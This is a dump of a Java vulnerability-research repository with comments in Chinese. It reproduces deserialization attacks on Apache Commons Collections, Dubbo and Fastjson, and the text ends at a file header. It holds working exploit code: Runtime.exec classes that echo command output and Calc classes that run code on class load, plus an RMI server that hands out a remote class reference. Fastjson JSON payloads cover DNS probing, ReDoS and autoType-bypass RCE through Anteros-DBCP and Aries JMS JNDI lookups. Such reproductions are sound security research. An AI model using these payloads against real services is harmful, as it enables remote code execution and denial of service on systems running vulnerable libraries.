1 | /** 2 | * @author xuanyh 3 | */ 4 | package com.threedr3am.bug.collections; -------------------------------------------------------------------------------- /common-collections/src/main/java/com/threedr3am/bug/collections/v3/no2/CallbackRuntime.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.collections.v3.no2; 2 | 3 | import java.io.BufferedInputStream; 4 | 5 | /** 6 | * 抛异常回显执行命令 7 | * 8 | * Created by threedr3am on 2018/5/5. 
9 | */ 10 | public class CallbackRuntime { 11 | public void exec(String cmd) throws Throwable { 12 | BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 13 | StringBuilder stringBuilder = new StringBuilder(); 14 | byte[] bytes = new byte[4096]; 15 | int len = 0; 16 | while ((len = bufferedInputStream.read(bytes)) != -1) 17 | stringBuilder.append(new String(bytes)); 18 | //此处最好不要使用Exception异常类,因为很多web项目可能会全局捕获该异常 19 | throw new Throwable(stringBuilder.toString()); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /common-collections/src/main/java/com/threedr3am/bug/collections/v3/no2/CallbackRuntime2.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.collections.v3.no2; 2 | 3 | import java.io.BufferedInputStream; 4 | 5 | /** 6 | * 利用加载时自动执行 & 抛异常回显 7 | * 8 | * Created by threedr3am on 2018/5/5. 9 | */ 10 | public class CallbackRuntime2 { 11 | public static String exec(String cmd) { 12 | try { 13 | BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 14 | StringBuilder stringBuilder = new StringBuilder(); 15 | byte[] bytes = new byte[4096]; 16 | int len = 0; 17 | while ((len = bufferedInputStream.read(bytes)) != -1) 18 | stringBuilder.append(new String(bytes)); 19 | bufferedInputStream.close(); 20 | return stringBuilder.toString(); 21 | } catch (Exception e) { 22 | e.printStackTrace(); 23 | } 24 | return ""; 25 | } 26 | static { 27 | if (true) { 28 | throw new RuntimeException(exec("/Applications/Calculator.app/Contents/MacOS/Calculator")); 29 | } 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /common-collections/src/main/java/com/threedr3am/bug/collections/v3/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 
apache-common-collections3 漏洞学习 3 | * 4 | * @author threedr3am 5 | */ 6 | package com.threedr3am.bug.collections.v3; -------------------------------------------------------------------------------- /common/src/main/java/Calc.java: -------------------------------------------------------------------------------- 1 | /** 2 | * @author threedr3am 3 | */ 4 | public class Calc { 5 | static { 6 | try { 7 | System.out.println("run Calc..."); 8 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 9 | } catch (Throwable e) { 10 | e.printStackTrace(); 11 | } 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * @author xuanyh 3 | */ 4 | package com.threedr3am.bug.common; -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/server/RmiServer.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.common.server; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import java.rmi.AlreadyBoundException; 5 | import java.rmi.RemoteException; 6 | import java.rmi.registry.LocateRegistry; 7 | import java.rmi.registry.Registry; 8 | import javax.naming.NamingException; 9 | import javax.naming.Reference; 10 | 11 | /** 12 | * rmi server 13 | * 14 | * @author threedr3am 15 | */ 16 | public class RmiServer { 17 | 18 | public static void main(String[] args) { 19 | run(); 20 | } 21 | 22 | public static void run() { 23 | try { 24 | Registry registry = LocateRegistry.createRegistry(43657); 25 | //TODO 把resources下的Calc.class 或者 自定义修改编译后target目录下的Calc.class 拷贝到下面代码所示http://host:port的web服务器根目录即可 26 | Reference reference = new Reference("Calc","Calc","http://localhost/"); 27 | ReferenceWrapper 
referenceWrapper = new ReferenceWrapper(reference); 28 | registry.bind("Calc",referenceWrapper); 29 | } catch (RemoteException e) { 30 | e.printStackTrace(); 31 | } catch (AlreadyBoundException e) { 32 | e.printStackTrace(); 33 | } catch (NamingException e) { 34 | e.printStackTrace(); 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/server/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 漏洞复现需要用到的server,例如:rmi、ldap 3 | * 4 | * @author threedr3am 5 | */ 6 | package com.threedr3am.bug.common.server; -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/utils/FileToByteArrayUtil.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.common.utils; 2 | 3 | import java.io.IOException; 4 | import java.io.InputStream; 5 | 6 | /** 7 | * Created by threedr3am on 2018/5/5. 
8 | */ 9 | public class FileToByteArrayUtil { 10 | /** 11 | * 读取class文件,转换为byte[]对象 12 | * @param classPath 13 | * @return 14 | * @throws IOException 15 | */ 16 | public static byte[] readCallbackRuntimeClassBytes(String classPath) throws IOException { 17 | //执行前先编译CallbackRuntime类得到class文件 18 | InputStream inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream(classPath); 19 | byte[] bytes = new byte[inputStream.available()]; 20 | inputStream.read(bytes); 21 | return bytes; 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/utils/SerializeUtil.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.common.utils; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.io.ByteArrayOutputStream; 5 | import java.io.ObjectInputStream; 6 | import java.io.ObjectOutputStream; 7 | 8 | /** 9 | * Created by threedr3am on 2018/5/5. 
10 | */ 11 | public class SerializeUtil { 12 | /** 13 | * 序列化 14 | * 15 | */ 16 | public static byte[] serialize(Object o) throws Exception { 17 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 18 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 19 | objectOutputStream.writeObject(o); 20 | byte[] bytes = byteArrayOutputStream.toByteArray(); 21 | objectOutputStream.close(); 22 | return bytes; 23 | } 24 | 25 | /** 26 | * 反序列化 27 | * 28 | */ 29 | public static T deserialize(byte[] bytes) throws Exception { 30 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes); 31 | ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream); 32 | T o = (T) objectInputStream.readObject(); 33 | objectInputStream.close(); 34 | return o; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /common/src/main/java/com/threedr3am/bug/common/utils/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 工具包 3 | * 4 | * @author threedr3am 5 | */ 6 | package com.threedr3am.bug.common.utils; -------------------------------------------------------------------------------- /common/src/main/java/org/apache/catalina/startup/Catalina.java: -------------------------------------------------------------------------------- 1 | //package org.apache.catalina.startup; 2 | // 3 | ///** 4 | // * @author threedr3am 5 | // */ 6 | //public class Catalina { 7 | // static { 8 | // try { 9 | // System.out.println("run Calc..."); 10 | // Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 11 | // } catch (Throwable e) { 12 | // e.printStackTrace(); 13 | // } 14 | // } 15 | //} 16 | -------------------------------------------------------------------------------- /common/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory: 
-------------------------------------------------------------------------------- 1 | #CalcScriptEngineFactory -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | dubbo-hessian2-safe-reinforcement 8 | com.threedr3am 9 | 1.0-SNAPSHOT 10 | 11 | 12 | learn-dubbo-client-boot 13 | 0.0.1-SNAPSHOT 14 | learn-dubbo-client-boot 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | com.threedr3am 24 | learn-dubbo-server-boot 25 | 0.0.1-SNAPSHOT 26 | 27 | 28 | 29 | 30 | 31 | 32 | org.springframework.boot 33 | spring-boot-maven-plugin 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/client/boot/LearnDubboClientBootApplication.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.client.boot; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class LearnDubboClientBootApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(LearnDubboClientBootApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/client/boot/Test.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.client.boot; 2 | 3 | import com.threedr3am.learn.server.boot.A; 4 | import com.threedr3am.learn.server.boot.DemoService; 5 | import java.sql.SQLException; 6 | import 
javax.annotation.PostConstruct; 7 | import org.apache.dubbo.config.annotation.Reference; 8 | import org.springframework.stereotype.Service; 9 | 10 | /** 11 | * @author xuanyh 12 | */ 13 | @Service 14 | public class Test { 15 | 16 | @Reference(version = "1.0") 17 | private DemoService demoService; 18 | 19 | @PostConstruct 20 | private void init() throws SQLException { 21 | A a = new A(); 22 | a.setName("xuanyh"); 23 | new Thread(() -> { 24 | while (true) { 25 | System.out.println(demoService.hello(a)); 26 | try { 27 | Thread.currentThread().sleep(5000); 28 | } catch (InterruptedException e) { 29 | e.printStackTrace(); 30 | } 31 | } 32 | }).start(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/serialize/MyHessian2Input.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.serialize; 2 | 3 | import com.alibaba.com.caucho.hessian.io.Hessian2Input; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | import java.lang.reflect.Field; 7 | import java.util.List; 8 | 9 | /** 10 | * @author xuanyh 11 | */ 12 | public class MyHessian2Input extends Hessian2Input { 13 | 14 | /** 15 | * Creates a new Hessian input stream, initialized with an underlying input stream. 16 | * 17 | * @param is the underlying input stream. 18 | */ 19 | public MyHessian2Input(InputStream is) { 20 | super(is); 21 | } 22 | 23 | @Override 24 | public Object readObject(Class cl) throws IOException { 25 | return super.readObject(cl); 26 | } 27 | 28 | @Override 29 | public Object readObject(Class expectedClass, Class... 
expectedTypes) throws IOException { 30 | return super.readObject(expectedClass, expectedTypes); 31 | } 32 | 33 | @Override 34 | public Object readObject() throws IOException { 35 | return super.readObject(); 36 | } 37 | 38 | @Override 39 | public Object readObject(List> expectedTypes) throws IOException { 40 | return super.readObject(expectedTypes); 41 | } 42 | 43 | void checkClassDef() { 44 | if (_classDefs.isEmpty()) 45 | return; 46 | for (Object c : _classDefs) { 47 | Field[] fields = c.getClass().getDeclaredFields(); 48 | System.out.println(); 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/resources/META-INF/dubbo/org.apache.dubbo.common.serialize.Serialization: -------------------------------------------------------------------------------- 1 | MyHessian2=com.threedr3am.learn.serialize.MyHessian2Serialization -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | spring.application.name=dubbo-consumer 2 | server.port=9990 3 | spring.main.allow-bean-definition-overriding=true 4 | 5 | # Dubbo Application 6 | # The default value of dubbo.application.name is ${spring.application.name} 7 | # dubbo.application.name=${spring.application.name} 8 | 9 | # 扫描dubbo服务(@Service.. @Reference..) 
10 | dubbo.scan.basePackages=com.threedr3am.learn.client.boot 11 | 12 | # 注册中心 13 | dubbo.registry.id=dubboRegistry 14 | dubbo.registry.timeout=5000 15 | dubbo.registry.address=zookeeper://127.0.0.1:2181 16 | dubbo.registry.client=curator 17 | # 元数据地址 18 | dubbo.metadata-report.address=zookeeper://127.0.0.1:2181 19 | 20 | 21 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/test/java/com/threedr3am/learn/client/boot/LearnDubboClientBootApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.client.boot; 2 | 3 | import org.junit.Test; 4 | import org.junit.runner.RunWith; 5 | import org.springframework.boot.test.context.SpringBootTest; 6 | import org.springframework.test.context.junit4.SpringRunner; 7 | 8 | //@RunWith(SpringRunner.class) 9 | //@SpringBootTest 10 | public class LearnDubboClientBootApplicationTests { 11 | 12 | @Test 13 | public void contextLoads() { 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | dubbo-hessian2-safe-reinforcement 8 | com.threedr3am 9 | 1.0-SNAPSHOT 10 | 11 | 12 | learn-dubbo-server-boot 13 | 0.0.1-SNAPSHOT 14 | learn-dubbo-server-boot 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | org.springframework.boot 29 | spring-boot-maven-plugin 30 | 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/A.java: -------------------------------------------------------------------------------- 1 | package 
com.threedr3am.learn.server.boot; 2 | 3 | import java.io.Serializable; 4 | 5 | /** 6 | * @author xuanyh 7 | */ 8 | public class A implements Serializable { 9 | 10 | String name; 11 | 12 | public A() { 13 | System.out.println("A被实例化了"); 14 | } 15 | 16 | public String getName() { 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | this.name = name; 22 | } 23 | 24 | @Override 25 | public boolean equals(Object obj) { 26 | System.out.println("A.equals"); 27 | return super.equals(obj); 28 | } 29 | 30 | @Override 31 | public String toString() { 32 | System.out.println("A.toString"); 33 | return super.toString(); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/B.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.server.boot; 2 | 3 | import java.io.Serializable; 4 | 5 | /** 6 | * @author xuanyh 7 | */ 8 | public class B implements Serializable { 9 | 10 | String name; 11 | 12 | public B() { 13 | System.out.println("B被实例化了"); 14 | } 15 | 16 | public String getName() { 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | this.name = name; 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/DemoService.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.server.boot; 2 | 3 | /** 4 | * @author xuanyh 5 | */ 6 | public interface DemoService { 7 | 8 | String hello(A a); 9 | } 10 | -------------------------------------------------------------------------------- 
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/DemoServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.server.boot; 2 | 3 | import org.apache.dubbo.config.annotation.Service; 4 | 5 | /** 6 | * @author xuanyh 7 | */ 8 | @Service(registry = "dubboRegistry", timeout = 3000, version = "1.0", retries = 3, loadbalance = "random", actives = 5) 9 | public class DemoServiceImpl implements DemoService { 10 | 11 | public String hello(A a) { 12 | return "hello! " + a.getName(); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/LearnDubboServerBootApplication.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.server.boot; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class LearnDubboServerBootApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(LearnDubboServerBootApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/resources/META-INF/dubbo/org.apache.dubbo.common.serialize.Serialization: -------------------------------------------------------------------------------- 1 | MyHessian2=com.threedr3am.learn.server.boot.serialize.MyHessian2Serialization -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/resources/application.properties: 
-------------------------------------------------------------------------------- 1 | spring.application.name=service-provider 2 | server.port=9999 3 | 4 | spring.main.allow-bean-definition-overriding=true 5 | # 扫描dubbo服务(@Service.. @Reference..) 6 | dubbo.scan.basePackages=com.threedr3am.learn.server.boot 7 | 8 | # 通信协议 9 | dubbo.protocol.name=dubbo 10 | dubbo.protocol.port=20881 11 | #dubbo.protocol.server=tomcat 12 | 13 | # 注册中心 14 | dubbo.registry.id=dubboRegistry 15 | dubbo.registry.timeout=5000 16 | dubbo.registry.address=zookeeper://127.0.0.1:2181 17 | # Dubbo 支持 zkclient 和 curator 两种 Zookeeper 客户端实现:在2.7.x的版本中已经移除了zkclient的实现,如果要使用zkclient客户端,需要自行拓展 18 | dubbo.registry.client=curator 19 | # 元数据地址 20 | dubbo.metadata-report.address=zookeeper://127.0.0.1:2181 21 | 22 | dubbo.provider.serialization=MyHessian2 -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/test/java/com/threedr3am/learn/server/boot/LearnDubboServerBootApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.learn.server.boot; 2 | 3 | import org.junit.Test; 4 | import org.junit.runner.RunWith; 5 | import org.springframework.boot.test.context.SpringBootTest; 6 | import org.springframework.test.context.junit4.SpringRunner; 7 | 8 | //@RunWith(SpringRunner.class) 9 | //@SpringBootTest 10 | public class LearnDubboServerBootApplicationTests { 11 | 12 | @Test 13 | public void contextLoads() { 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /dubbo/dubbo-hessian2-safe-reinforcement/module-info: -------------------------------------------------------------------------------- 1 | /** 2 | * Dubbo Hessian反序列化安全加固demo 3 | * 4 | * @author threedr3am 5 | */ 6 | -------------------------------------------------------------------------------- 
/dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Dubbo client attack demo 4 | * 5 | * 攻击Dubbo客户端的例子 6 | * 7 | * @author xuanyh 8 | */ 9 | package com.threedr3am.bug.dubbo.rouge; -------------------------------------------------------------------------------- /dubbo/src/main/java/com/threedr3am/bug/dubbo/support/NoWriteReplaceSerializerFactory.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.dubbo.support; 2 | 3 | import com.caucho.hessian.io.HessianProtocolException; 4 | import com.caucho.hessian.io.Serializer; 5 | import com.caucho.hessian.io.SerializerFactory; 6 | import com.caucho.hessian.io.UnsafeSerializer; 7 | import com.caucho.hessian.io.WriteReplaceSerializer; 8 | 9 | /** 10 | * @author xuanyh 11 | */ 12 | public class NoWriteReplaceSerializerFactory extends SerializerFactory { 13 | 14 | /** 15 | * {@inheritDoc} 16 | * 17 | * @see SerializerFactory#getObjectSerializer(Class) 18 | */ 19 | @Override 20 | public Serializer getObjectSerializer(Class cl) throws HessianProtocolException { 21 | return super.getObjectSerializer(cl); 22 | } 23 | 24 | 25 | /** 26 | * {@inheritDoc} 27 | * 28 | * @see SerializerFactory#getSerializer(Class) 29 | */ 30 | @Override 31 | public Serializer getSerializer(Class cl) throws HessianProtocolException { 32 | Serializer serializer = super.getSerializer(cl); 33 | 34 | if (serializer instanceof WriteReplaceSerializer) { 35 | return UnsafeSerializer.create(cl); 36 | } 37 | return serializer; 38 | } 39 | 40 | } 41 | -------------------------------------------------------------------------------- /fastjson/src/main/java/Evil.java: -------------------------------------------------------------------------------- 1 | //import java.io.IOException; 2 | //import java.nio.charset.Charset; 3 | //import java.util.HashSet; 4 | //import java.util.Iterator; 5 
| // 6 | ///** 7 | // * @author threedr3am 8 | // */ 9 | //public class Evil extends java.nio.charset.spi.CharsetProvider { 10 | // 11 | // @Override 12 | // public Iterator charsets() { 13 | // return new HashSet().iterator(); 14 | // } 15 | // 16 | // @Override 17 | // public Charset charsetForName(String charsetName) { 18 | // if (charsetName.startsWith("Evil")) { 19 | // try { 20 | // Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 21 | // } catch (IOException e) { 22 | // e.printStackTrace(); 23 | // } 24 | // } 25 | // return Charset.forName("UTF-8"); 26 | // } 27 | //} 28 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet4AddressPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.dns; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * @author threedr3am 7 | */ 8 | public class Inet4AddressPoc { 9 | 10 | public static void main(String[] args) { 11 | String payload = "{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}"; 12 | try { 13 | JSON.parse(payload); 14 | } catch (Exception e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet6AddressPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.dns; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * @author threedr3am 7 | */ 8 | public class Inet6AddressPoc { 9 | 10 | public static void main(String[] args) { 11 | String payload = "{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog\"}"; 12 | try { 13 | JSON.parse(payload); 14 | } catch (Exception e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | } 19 | 
-------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/InetSocketAddressPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.dns; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * @author threedr3am 7 | */ 8 | public class InetSocketAddressPoc { 9 | 10 | public static void main(String[] args) { 11 | String payload = "{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"xxx.dns\"}, \"port\":80}"; 12 | try { 13 | JSON.parse(payload); 14 | } catch (Exception e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/URLPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.dns; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * @author threedr3am 7 | */ 8 | public class URLPoc { 9 | 10 | public static void main(String[] args) { 11 | String payload = "{{\"@type\":\"java.net.URL\",\"val\":\"http://xxx.dns\"}:\"aaa\"}"; 12 | try { 13 | JSON.parse(payload); 14 | } catch (Exception e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/dos/ReDOSPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.dos; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * 正则DOS Fastjson < 1.2.66 7 | * 8 | * @author threedr3am 9 | */ 10 | public class ReDOSPoc { 11 | 12 | public static void main(String[] args) { 13 | String payload = "{\"aaaaa\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\"regex\":{\"$ref\":\"$[aaaaa rlike '(x+)*y']\"}}"; 14 | JSON.parse(payload); 15 | } 16 | } 17 | 
-------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/leak/seleniumBypassAutotype1_2_68.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.leak; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.JSONObject; 5 | 6 | /** 7 | * bypass autotype <= 1.2.68 8 | */ 9 | public class seleniumBypassAutotype1_2_68 { 10 | 11 | public static void main(String[] args) { 12 | 13 | String payload = "\n" 14 | + "{\n" 15 | + " \"name\":\"tony\",\n" 16 | + " \"email\":\"tony@qq.com\",\n" 17 | + " \"content\":{\"$ref\":\"$x.systemInformation\"},\n" 18 | + " \"x\":{\n" 19 | + " \"@type\":\"java.lang.Exception\",\"@type\":\"org.openqa.selenium.WebDriverException\"\n" 20 | + " }\n" 21 | + "}"; 22 | try { 23 | JSONObject jsonObject = JSON.parseObject(payload); 24 | System.out.println(jsonObject.getString("content")); 25 | } catch (Exception e) { 26 | e.printStackTrace(); 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * fastjson漏洞学习 3 | * 4 | * <= 1.2.24 默认AutoTypeSupport=true 5 | * 6 | * @author threedr3am 7 | */ 8 | package com.threedr3am.bug.fastjson; -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AnterosPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | import com.threedr3am.bug.common.server.LdapServer; 6 | 7 | /** 8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to 阿里云先知众测 - 内部已知) 9 | * 10 | * 
Anteros-DBCP依赖的gadget 11 | * 12 | * 13 | * com.codahale.metrics 14 | * metrics-healthchecks 15 | * 3.0.2 16 | * 17 | * 18 | * 19 | * br.com.anteros 20 | * Anteros-Core 21 | * 1.2.1 22 | * 23 | * 24 | * 25 | * br.com.anteros 26 | * Anteros-DBCP 27 | * 1.0.1 28 | * 29 | * 30 | * @author threedr3am 31 | */ 32 | public class AnterosPoc { 33 | static { 34 | //rmi server示例 35 | // RmiServer.run(); 36 | 37 | //ldap server示例 38 | LdapServer.run(); 39 | } 40 | 41 | public static void main(String[] args) { 42 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 43 | 44 | String payload = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";//ldap方式 45 | JSON.parse(payload); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | import com.threedr3am.bug.common.server.LdapServer; 6 | import java.io.IOException; 7 | 8 | /** 9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击 10 | * 11 | * 12 | * org.apache.aries.transaction 13 | * org.apache.aries.transaction.jms 14 | * 2.0.0 15 | * 16 | * 17 | * @author threedr3am 18 | */ 19 | public class AriesJMSPoc { 20 | 21 | static { 22 | //rmi server示例 23 | // RmiServer.run(); 24 | 25 | //ldap server示例 26 | LdapServer.run(); 27 | } 28 | 29 | public static void main(String[] args) throws IOException { 30 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 31 | 32 | String json = "{\"@type\":\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, 
\"transactionManager\": {\"$ref\":\"$.transactionManager\"}}"; 33 | JSON.parse(json); 34 | } 35 | 36 | 37 | } 38 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc2.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | import com.threedr3am.bug.common.server.LdapServer; 6 | import java.io.IOException; 7 | 8 | /** 9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击 10 | * 11 | * 12 | * org.apache.aries.transaction 13 | * org.apache.aries.transaction.jms 14 | * 2.0.0 15 | * 16 | * 17 | * @author threedr3am 18 | */ 19 | public class AriesJMSPoc2 { 20 | 21 | static { 22 | //rmi server示例 23 | // RmiServer.run(); 24 | 25 | //ldap server示例 26 | LdapServer.run(); 27 | } 28 | 29 | public static void main(String[] args) throws IOException { 30 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 31 | 32 | String json = "{\"@type\":\"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, \"transactionManager\": {\"$ref\":\"$.transactionManager\"}}"; 33 | JSON.parse(json); 34 | } 35 | 36 | 37 | } 38 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/Cmd.java: 